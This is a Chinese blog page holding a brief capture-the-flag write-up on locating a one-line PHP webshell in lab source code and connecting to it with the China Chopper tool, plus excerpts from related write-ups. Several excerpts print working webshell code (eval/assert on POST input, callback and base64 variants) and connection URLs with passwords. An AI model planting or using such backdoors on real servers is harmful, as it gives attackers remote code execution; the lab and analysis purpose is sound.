墨者学院-WebShell代码分析溯源(第1题)

最新推荐文章于 2024-03-15 17:11:04 发布
最新推荐文章于 2024-03-15 17:11:04 发布
阅读量259 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_39998158/article/details/100548570
版权

WebShell代码分析溯源(第1题)

难易程度:★
题目类型:代码审计
使用工具:FireFox浏览器、记事本、菜刀

1.打开靶场,下载网页源代码。
2.打开文件夹,寻找可疑的文件,发现可疑文件cn-right.php。
打开发现,典型的一句话木马。
在这里插入图片描述
3.打开菜刀,尝试连接。
url为http://219.153.49.228:43269/www/cn-right.php?POST=assert
密码为GET
在这里插入图片描述
4.连接成功,在html文件夹找到key文件,打开获取key。
在这里插入图片描述

JimWu95
关注
墨者学院 - WebShell文件上传分析溯源(第2)
多崎巡礼的博客
08-01 2335
御剑扫描网址可以得到 ip/admin/upload1.php,ip/admin/upload2.php 尝试 ip/admin/upload.php,发现直接跳转upload1.php,没有访问权限继续跳转upload2.php burpsuite抓包,截取upload.php,查看源码得到 forward一下 将uploadmd5更改为 upload_file.php 发送给re...
墨者学院 - WebShell代码分析溯源(第5)
多崎巡礼的博客
08-02 837
  一个个看,,,找到该文件,经典的回调函数形式 菜刀连接, ip/www/Exception.php?POST=assert 密码为assert 得到key 关于回调函数可参考此文章 https://blog.csdn.net/qq_24196029/article/details/78118680     <?php error_reporting(0); call...
墨者学院 - WebShell代码分析溯源(第2)
多崎巡礼的博客
07-31 761
<?php  $POST['POST']='assert'; $array[]=$POST; $array[0]['POST']($_POST['assert']) ;?> assert,是php代码执行函数,与eval()有同样的功能,assert()函数中参数为表达式 (或者为函数) 因为$array[], POST[]都是数组,所以$array[]=$POST,就是...
WebShell代码分析溯源(第1)墨者学院
weixin_34161032的博客
01-10 239
一、访问链接 二、下载系统源码后直接放到D盾里扫描,扫到后门文件 三、查看该木马文件 <?phperror_reporting(0);$_GET['POST']($_POST['GET']);?> 1.error_reporting(0); 关闭错误报告 2.$_GET['POST']($_POST['GET']); 一句话木马,GET传...
墨者 - WebShell代码分析溯源(第1)
吃肉唐僧的博客
07-12 208
下载源码后,一个一个文件看 看到一句话木马文件, 至于代码是什么意思我有一篇博客做的时候已经详细探究过:https://blog.csdn.net/qq_39936434/article/details/95591629 接下开就是菜刀无惧链接 ...
WebShell代码分析溯源(第1)
jeehoon的博客
09-05 196
下载源代码,寻找一句话木马所在的文件,发现这个是一句话木马的变种,我们在令参数POST = assert http://219.153.49.228:49780/www/cn-right.php?POST=assert 然后打开菜刀,输入密码GET 获得key ...
墨者学院 - WebShell代码分析溯源(第11)
多崎巡礼的博客
08-06 741
&lt;?php  if(!empty($_GET[1]) &amp;&amp; $_GET[1]=='GET.fPZ87'){                     //若get到的1不为空且1=GET.fPZ87的话执行下面操作     $_=@fopen('t.php', 'a');                                                      ...
墨者学院 - WebShell代码分析溯源(第4)
多崎巡礼的博客
08-02 715
唉让我如此信任的工具在这道上栽了跟头。。。嗯,以后的结果仅供参考。   下载源代码,在hack文件夹下发现bin.php 打开分析代码得知其为php回调函数类一句话木马 且获得其密码,通过菜刀连接 菜刀连接http://219.153.49.228:42394/www/hack/bin.php?e=YXNzZXJ0 密码为POST array_filter()函数用回调函数过...
墨者学院 - WebShell代码分析溯源(第3)
多崎巡礼的博客
07-31 809
    $g是个数组,根据ASCll码对应表可以得到$g[1]='s',chr('116')='t',那么$gg=assert,@$gg($_POST[joker])不就是assert($_POST[joker]),组成了我们常见的一句话脚本 运用菜刀访问目录 ip/www/js/jquery1.42.min.php 密码get html路径下拿到key   &lt;?php...
墨者学院 - WebShell代码分析溯源(第8)
多崎巡礼的博客
08-05 730
审查代码 1、先找到黑页所在目录,观察同层级的其他文件命名和修改时间,选中可疑文件审计代码 2、没有新的发现,就去目录查找,根据最后的修改时间排查。 C:\Users\BayernChenTutu\Desktop\www_bak\fields\class-wp-rest-comment-meta-style.php   &lt;?php error_reporting(0); ...
WebShell文件上传漏洞分析溯源(第1)
WEB渗透测试 从入门到萌新
04-07 1302
目地址:WebShell文件上传漏洞分析溯源(第1)_文件上传_在线靶场_墨者学院_专注于网络安全人才培养 一句话木马文件 <?php eval(@$_POST['123456']);?> 接下来使用burpsite 1、设置代理 2、配置burpsite 代理 抓包 ctrl +r ...
墨者学院 - WebShell文件上传漏洞分析溯源(第1)
多崎巡礼的博客
07-26 1568
上传图片成功 上传php失败,即存在过滤 尝试更改php版本 上传成功 得到key
WEBWebShell代码分析溯源(第4)
HAPPY
08-19 1190
查看到可以webshell后定位到源代码:   这个的用法: get网址中传入 ?e=YXNzZXJ0   (arrest的base64加密值为YXNzZXJ0) 菜刀连接用法: http://www.xxx.com/3.php?e=YXNzZXJ0 密码:POST 详解:base64_decode()函数主要用于base64的解码,YXNzZXJ0的base64解码后的结果为...
墨者 - WebShell代码分析溯源(第2)
吃肉唐僧的博客
07-12 265
下载文件,查看index.php 发现一句话木马 <?php $POST['POST']='assert';$array[]=$POST;$array[0]['POST']($_POST['assert']);?> 解释一下,这是一句话木马的变种 $array[],POST[]都是数组(表单域的名称会自动成为 $_POST 数组中的键), 所以array[]=arra...
WebShell文件上传漏洞分析溯源(墨者学院)
全村的希望
10-14 949
WebShell文件上传漏洞分析溯源
Webshell溯源排査与反制
最新发布
2301_76786857的博客
03-15 597
溯源排查中比较重要的一环是web突破口排查,攻击者通过web突破口入侵时,有极大的概率会写入webshell
墨者学院WebShell文件上传分析溯源(第2)
yoyoko_chan的博客
07-23 308
0x00  偶然看到这道,学习一下文件上传的新姿势。 0x01  打开靶机,没啥提示,那就先用御剑扫一扫后台  发现 /admin/upload1.php /admin/upload2.php  访问/admin/upload1.php后发现显示权限不够,并直接跳到了/admin/upload2.php  抓包查看upload1.php的相应包,发现该弹窗是由JS代码控制的,浏览器设置禁用JS后再次访问  主菜来了,直接上传菜刀,上传成功后用蚁剑试连接,出现异常  猜测是由于网站后台对上传的文件
墨者学院WebShell文件上传漏洞分析溯源(第4)
m0_66835614的博客
11-29 877
WebShell文件上传漏洞分析溯源(第4)
墨者学院sql注入 x-f
07-27
墨者学院SQL注入是一种常见的Web应用程序安全漏洞,攻击者通过在输入字段中插入恶意的SQL代码来实现对数据库的非授权访问。X-F是HTTP请求头部的一个字段,通常用于传递客户端IP地址或其他相关信息。在某些情况下,...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值